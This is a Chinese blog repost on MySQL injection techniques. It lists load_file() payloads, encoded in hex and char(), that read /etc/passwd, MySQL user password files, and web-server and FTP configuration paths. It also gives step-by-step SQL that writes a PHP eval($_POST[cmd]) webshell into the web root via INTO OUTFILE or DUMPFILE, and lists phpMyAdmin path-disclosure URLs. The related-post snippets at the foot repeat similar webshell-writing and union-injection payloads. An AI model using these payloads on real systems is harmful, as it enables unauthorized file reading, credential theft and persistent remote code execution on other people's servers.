针对MYSQL数据注入时用到的 load_file()函数

最新推荐文章于 2022-08-29 20:46:35 发布
最新推荐文章于 2022-08-29 20:46:35 发布
阅读量251 收藏
点赞数
文章标签: php 数据库 shell
原文链接:http://www.cnblogs.com/94YY/archive/2011/05/16/2047738.html
版权
针对MYSQL数据注入时用到的 load_file()函数对其文件查看的相关路径:
1、 replace(load_file(0x2F6574632F706173737764),0x3c,0x20)
2、replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 < 替换成空格 返回的是网页.而无法查看到代码.
3、 load_file(char(47)) 可以列出FreeBSD,Sunos系统根目录
4、/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
5、c:Program FilesApache GroupApacheconf httpd.conf 或C:apacheconf httpd.conf 查看WINDOWS系统apache文件
6、c:/Resin-3.0.14/conf/resin.conf   查看jsp开发的网站 resin文件配置信息.
7、c:/Resin/conf/resin.conf      /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机
8、d:APACHEApache2confhttpd.conf
9、C:Program Filesmysqlmy.ini
10、../themes/darkblue_orange/layout.inc.php phpmyadmin 爆路径
11、 c:windowssystem32inetsrvMetaBase.xml 查看IIS的虚拟主机配置文件
12、 /usr/local/resin-3.0.22/conf/resin.conf 针对3.0.22的RESIN配置文件查看
13、 /usr/local/resin-pro-3.0.22/conf/resin.conf 同上
14 、/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
15、 /etc/sysconfig/iptables 本看防火墙策略
16 、 usr/local/app/php5/lib/php.ini PHP 的相当设置
17 、/etc/my.cnf MYSQL的配置文件
18、 /etc/redhat-release   红帽子的系统版本
19 、C:mysqldatamysqluser.MYD 存在MYSQL系统中的用户密码
20、/etc/sysconfig/network-scripts/ifcfg-eth0 查看IP.
21、/usr/local/app/php5/lib/php.ini //PHP相关设置
22、/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
23、c:Program FilesRhinoSoft.comServ-UServUDaemon.ini
24、c:windowsmy.ini
---------------------------------------------------------------------------------------------------------------------------------
1.如何拿到登陆密码. 自己想办法 
2.访问 : http://url/phpmyadmin/libraries/select_lang.lib.php 得到物理路径.
3.选择一个Database.运行以下语句.
----start code---
Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES('<?php eval($_POST[cmd]);?>');
select cmd from a into outfile 'x:/phpMyAdmin/libraries/d.php';
Drop TABLE IF EXISTS a;
----end code---
4.如果没什么意外.对应网站得到webshell
思路与mssql一样,都是建个表,然后在表中插一句话木马,在导出到web目录!
补充:还可以直接用dumpfile来得到shell
select 0x3c3f706870206576616c28245f504f53545b636d645d293f3e into DUMPFILE 'C:/XXX/php.php';
加密部分为 lanker 一句话 密码为 cmd
--------------------------------------------------------------------------------------------------------
phpmyadmin的libraries目录多个文件存在绝对路径泄露漏洞- -                                       
        http://target/phpmyadmin/libraries/string.lib.php
        http://target/phpmyadmin/libraries/string.lib.php
        http://target/phpmyadmin/libraries/database_interface.lib.php
        http://target/phpmyadmin/libraries/db_table_exists.lib.php
        http://target/phpmyadmin/libraries/display_export.lib.php
        http://target/phpmyadmin/libraries/header_meta_style.inc.php
        http://target/phpmyadmin/libraries/mcrypt.lib.php

转载于:https://www.cnblogs.com/94YY/archive/2011/05/16/2047738.html

dibodang1423
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Mysql注入中的outfile、dumpfileload_file函数详解
09-09
主要介绍了Mysql注入中的outfile、dumpfileload_file,需要的朋友可以参考下
mysql写入一句话木马
热门推荐
Websec
07-16 1万+
前提: root权限,知道了服务器的web的绝对路径,尝试写入一句话 mysql查询语句执行:select "&lt;?php @eval($_POST['pass']);?&gt;" INTO OUTFILE "D:\Wamp\2.php" 注意事项: 1、绝对路径的猜解 2、INTO OUTFILE 后面的"D:\Wamp\2.php",有的候需要变成“D:\\Wamp\\2.ph...
mysql写一句话代码_mysql 写入一句话
weixin_39932479的博客
01-18 506
mysql 写入一句话方法一:1、SHOW VARIABLES LIKE "secure_file_priv"; 查看文件导出功能是否开启 如果:secure_file_priv NULL 值为 null 说明禁止状态,无法导出为文件,需要修改MySQL配置文件:查看是否有 secure_file_priv = ,没有的话添加上 如果为一个目录,如:s...
MYSQL快速写入一句话拿权限技巧
KHOST的博客
01-31 750
必须条件: root权限 GPC关闭(能使用单引号) 有绝对路径(读文件可以不用,写文件必须) 没有配置–secure-file-priv id=2) union select 1,2,3,4,5,6,7,'<? phpinfo(); ?>’ into outfile ‘/home/wwwroot/lu4n.com/luan_phpinfo.php’# <? phpinfo()...
MySQL 写一句话拿 WebShell
ShadowySpirits的博客
10-03 5075
本文介绍两种利用 MySQL getshell 的方法: select … into outfile general_log 一、select … into outfile 介绍 利用需要满足以下条件: 对web目录有写权限 GPC关闭(能使用单引号) 有绝对路径(读文件可以不用,写文件必须) 没有配置 –secure-file-priv 姿势: 有 union id=2) union...
mysql写入一句话的方式
孤的博客
09-30 1211
一、union select 后写入 最常见的写入方式,union select 后跟 into outfile 语句 1’ union select 1,2,’<?php @eval($_POST[cmd]);?>’ into outfile “C:\phpStudy\PHPTutorial\WWW\shell.php” --+ 1’ union select 1,2,’<?p...
MYSQL注入load_file()函数的进一步应用.pdf
09-30
MYSQL注入load_file()函数的进一步应用.pdf
MySQL使用LOAD_FILE()函数方法总结
09-09
在本篇文章里小编给大家分享了关于MySQL使用LOAD_FILE()函数方法和相关知识点,需要的朋友们学习下。
mysql如何输出一句话_MySQL/ACCESS导出一句话拿WebShell后门命令
weixin_39778400的博客
01-19 1248
MySQL:Drop TABLE IF EXISTS temp; //如果存在temp就删掉Create TABLE temp(cmd text NOT NULL); //建立temp表,里面就一个cmd字段Insert INTO temp (cmd) VALUES( php eval($_POST[cmd]);?>); //把一句话***插入到temp表Select cmd from te...
使用msf,mysql数据库弱密码,上传一句话
weixin_64655821的博客
08-29 175
使用msf,mysql数据库弱密码,上传一句话
MySQL导出一句话拿WebShell的方法
06-19
MySQL导出一句话拿WebShell的方法
数据库经典语句
sherlockmj的博客
01-17 595
1、说明:创建数据库   CREATE DATABASE database-name   2、说明:删除数据库   drop database dbname   3、说明:备份sql server   ---创建 备份数据的 device   USE master   EXEC sp_addumpdevice 'disk', 'testBack', 'c:\mssql7...
mysql注入写一句话_MySQL手工注入步骤+直接写入一句话
weixin_29227585的博客
01-19 2685
(1)判断注入点 接着通过and 1=1 和 and 1=2测试发现前者正常,后者异常,可以肯定存在注入点,接下来判断该页面查询数据库的字段(2)查询字段数http://unisscan.cn/list.php?lei=246 order by n--结果发现有31个字段 (3)看看哪些字段可以显示信息http://unisscan.cn/list.php?lei=246 and 1=2 uni...
linux mysql写入一句话,mysql 写入一句话
weixin_39947908的博客
05-12 258
mysql 写入一句话方法一:1、SHOW VARIABLES LIKE "secure_file_priv"; 查看文件导出功能是否开启 如果:secure_file_priv NULL 值为 null 说明禁止状态,无法导出为文件,需要修改MySQL配置文件:查看是否有 secure_file_priv = ,没有的话添加上 如果为一个目录,如:s...
SQL注入SQLmap简单用法,和SQL注入写入一句话木马
m0_56214376的博客
03-16 8331
SQL注入 Boolean注入攻击-布尔盲注 1' and length(database())>1 -- qwe 1’ and length(database())>10 # mysql数据库中的字符串函数 substr()函数和hibernate的substr()参数都一样,但含义有所不同。 用法: substr(string string,num start,num length); string为字符串; start为起始位置; length为长度。 1’ and ascii(s
数据库的一句话的批量语句插入
小jinx的博客
02-20 474
之前项目中有个关系表要维护,我是查出来后一条条添加到关系表里面,非常的麻烦。后面就换上了这种简单的批量添加方法。 数据库表 role_right 角色与权限关系表 下面语句的意思是为拥有189权限的所有角色赋予190的权限。 INSERT INTO role_right (SELECT role_id,190 FROM role_right WHERE menu_id=189); ...
渗透基础问答
Terminal Cloud
06-26 1796
贴吧看到的。对于新手很有学习的意义,就搬过来了。 1.【拿到一个待检测的站,你觉得应该先做什么?】 收集信息: 服务器地址,站长信息,系统信息,搭建平台,程序语言,数据库信息,二级域名,有没有DNS,WAF,同服务器其他网站、whios 2.【利用注入点可以干什么?】 查询数据库信息,数据库权限,表名,字段名,管理员账号密码,爆出绝对路径,读写文件,数据库roor权限可以用sqlmap执
sql注入与一句话木马
告白的博客
07-09 3116
0x00 sql注入之一句话木马 首先介绍一下一句话木马: 一句话木马是一种基于 B/S结构的简短脚本,通过这个脚本,执行POST来的任意参数语句,可以提交任意内容,黑客借此进行SQL注入或拿到SHELL写入大马或截取网站私密信息,达到注入非法信息等的目的。 常见脚本的一句话木马: php的一句话木马: <?php @eval($_POST['pass']);?> asp的一句话是: <%eval request (“pass”)%> aspx的一句话是: <%@ Page
mysql load_file函数
最新发布
04-26
MySQL中的load_file函数用于将指定文件中的内容读取到一个字符串中。这个函数的语法如下: load_...需要注意的是,在使用load_file函数,需要将文件所在目录加入到MySQL的安全路径中,否则会因为安全限制而无法读取。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值